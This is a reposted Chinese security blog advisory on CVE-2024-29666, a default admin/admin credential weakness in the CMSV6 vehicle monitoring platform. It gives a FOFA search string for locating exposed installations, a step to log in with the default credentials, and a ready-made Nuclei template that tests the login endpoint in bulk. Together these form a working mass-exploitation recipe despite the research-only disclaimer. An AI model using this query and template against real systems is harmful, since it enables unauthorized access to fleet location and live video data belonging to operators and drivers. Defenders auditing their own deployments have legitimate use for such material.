CVE-2024-29666：CMSV6车辆监控平台系统中存在弱密码漏洞

admin

138643
文章

114
评论

2024年4月9日16:10:01评论102 views字数 825阅读2分45秒阅读模式

CVE-2024-29666：CMSV6车辆监控平台系统中存在弱密码漏洞

SPRING HAS ARRIVED

漏洞简介

CMSV6平台是基于车辆位置信息服务和实时视频传输服务的创新技术和开放运营理念。为GPS运营商车辆硬件设备制造商、车队管理企业等车辆运营相关企业提供核心基础数据服务。该系统CMSV6 7.31.0.2、7.32.0.3版本中存在弱密码漏洞。

SPRING HAS ARRIVED

漏洞复现

步骤一：使用以下语法搜索资产并确定测试目标...

# 搜索语法body="/808gps/"

步骤二：直接使用admin/admin进行登录...成功如下....

CVE-2024-29666：CMSV6车辆监控平台系统中存在弱密码漏洞

SPRING HAS ARRIVED

批量脚本

id: CVE-2024-29666info:  name: CMSV6车辆监控平台系统中存在弱密码漏洞  author: ly  severity: high  description: CMSV6平台是基于车辆位置信息服务和实时视频传输服务的创新技术和开放运营理念。为GPS运营商车辆硬件设备制造商、车队管理企业等车辆运营相关企业提供核心基础数据服务。该系统CMSV6 7.31.0.2、7.32.0.3版本中存在弱密码漏洞。用户名：admin 密码：admin  tags: cve-2024,cve  metadata:    max-request: 1    fofa-query: body="/808gps/"    verified: truehttp:  - method: GET    path:      - "{{BaseURL}}/StandardApiAction_login.action?account=admin&password=admin"    headers:      Accept-Encoding: gzip, deflate      Accept-Language: en    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains(body, 'admin')"

原文始发于微信公众号（揽月安全团队）：CVE-2024-29666：CMSV6车辆监控平台系统中存在弱密码漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2024-29666：CMSV6车辆监控平台系统中存在弱密码漏洞

Argo Events权限管理不当漏洞

Oracle E-Business Suite远程代码执行漏洞(CVE-2025-30727)

Apache Roller 漏洞让攻击者获得未经授权的访问

Oracle E-Business Suite远程代码执行漏洞（CVE-2025-30727）

Apache Roller 未经授权的访问漏洞

Gladinet漏洞CVE-2025-30406遭在野利用

安美酒店管理系统/get_user_enrollment.php接口 sql注入漏洞

Microsoft Edge信息泄露漏洞(CVE-2025-29834)

【已复现】Gladinet CentreStack & Triofox 远程RCE漏洞（CVE-2025-30406）

【成功复现】Palo Alto Networks PAN-OS 身份验证绕过漏洞(CVE-2025-0108)

发表评论

在线咨询

微信